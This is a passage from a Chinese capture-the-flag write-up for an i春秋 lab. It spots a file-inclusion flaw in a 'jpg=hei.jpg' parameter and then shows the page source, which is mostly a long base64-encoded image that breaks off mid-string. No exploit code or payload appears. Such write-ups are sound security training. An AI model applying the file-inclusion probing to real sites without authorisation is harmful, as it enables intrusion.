先去i春秋打开复现环境

打开链接,emmmmmmm(是我妹妹,逃~)

说正经的,jpg=hei.jpg 这一看就是文件包含。

我们先看看穹妹的源码吧

返回的是图片用base64译码的结果。

<title>file:hei.jpg</title><img src='data:image/gif;base64,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